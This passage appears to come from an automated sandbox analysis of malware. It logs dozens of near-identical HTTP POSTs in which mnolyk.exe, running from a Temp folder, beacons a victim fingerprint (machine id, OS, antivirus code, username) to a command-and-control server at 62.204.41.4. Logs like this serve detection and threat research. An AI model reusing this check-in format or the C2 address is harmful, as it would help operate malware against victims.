                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      632192.168.2.75032762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:51.514148951 CET747OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.579749107 CET747INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      633192.168.2.75032862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:51.766212940 CET748OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:51.831080914 CET748INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:51 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      634192.168.2.75032962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:52.020232916 CET749OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.084115028 CET749INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      635192.168.2.75033062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:52.266544104 CET750OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.330137968 CET750INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      636192.168.2.75033162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:52.497858047 CET751OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.560650110 CET751INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      637192.168.2.75033262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:52.732683897 CET752OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:52.796153069 CET752INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:52 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      638192.168.2.75033362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:52.974040031 CET753OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.042773962 CET753INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      639192.168.2.75033462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:53.217370987 CET754OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.283672094 CET754INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      64192.168.2.74975962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:17.049971104 CET179OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:17.114705086 CET179INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      640192.168.2.75033562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:53.466996908 CET755OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.531603098 CET755INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      641192.168.2.75033662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:53.715950966 CET756OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:53.781323910 CET756INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:53 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      642192.168.2.75033762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:53.984194994 CET757OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.047347069 CET757INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      643192.168.2.75033862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:54.241583109 CET758OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.304981947 CET758INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      644192.168.2.75033962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:54.482136011 CET759OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.546360970 CET759INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      645192.168.2.75034062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:54.719054937 CET760OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:54.782201052 CET760INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:54 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      646192.168.2.75034162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:54.975800037 CET761OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.040937901 CET761INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      647192.168.2.75034262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:55.215790033 CET762OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.279063940 CET762INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      648192.168.2.75034362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:55.462029934 CET763OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.527674913 CET763INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      649192.168.2.75034462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:09:55.700525045 CET764OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:55.764200926 CET764INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:55 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      65192.168.2.74976062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:17.283371925 CET180OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
